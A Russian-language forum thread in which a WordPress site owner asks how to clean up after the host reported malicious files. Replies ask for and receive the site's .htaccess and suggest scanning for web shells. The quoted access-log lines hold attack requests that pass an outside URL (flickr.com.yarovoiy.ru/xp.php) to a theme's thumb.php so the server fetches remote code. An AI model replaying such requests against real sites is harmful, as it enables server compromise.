Как удалить вредоносные файлы botnet_hack.txt WordPress?

Question

[dmmestny]

Здравствуйте.
Сайт на CMS WordPress
Хостинг прислал письмо чтобы я удалил вредоносные файлы и заблокировал сайт.
В переписке удалось получить лог:
111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/botnet_hack.txt/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2F=
flickr.com.yarovoiy.ru%2Fxp.php HTTP/1.1" 200 16813

111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/botnet_hack.txt/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2F=
flickr.com.yarovoiy.ru%2Fxp.php HTTP/1.1" 200 16813 "-" "Mozilla/5.0 =
(Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 =
Firefox/3.6"

111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2Fflickr.com.yarov=
oiy.ru%2Fxp.php HTTP/1.1" 200 16813

111.11.11.111 - - [21/Feb/2014:20:35:49 +1100] "GET =
/wp-content/themes/boldnews/thumb.php?src=3Dhttp%3A%2F%2Fflickr.com.yarov=
oiy.ru%2Fxp.php HTTP/1.1" 200 16813 "-" "Mozilla/5.0 (Windows; U; =
Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

111.11.11.111 - заменил реальный IP сайта.

Причем тут сайт yarovoiy .ru я вообще не пойму
И темы boldnews не имеется даже папки такой
Помогите пожалуйста разобраться как это исправить.
Спасибо

Answer 1

[Scorpi]

Скидывайте файл .htaccess

Answer 2

[dmmestny]

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

Answer 3

[aterentyev]

Возможно вам загрузили эту тему и файл botnet_hack.txt а потом удалили, надо проверять сайт на наличие шелов, уязвимостей, просканировать фтп.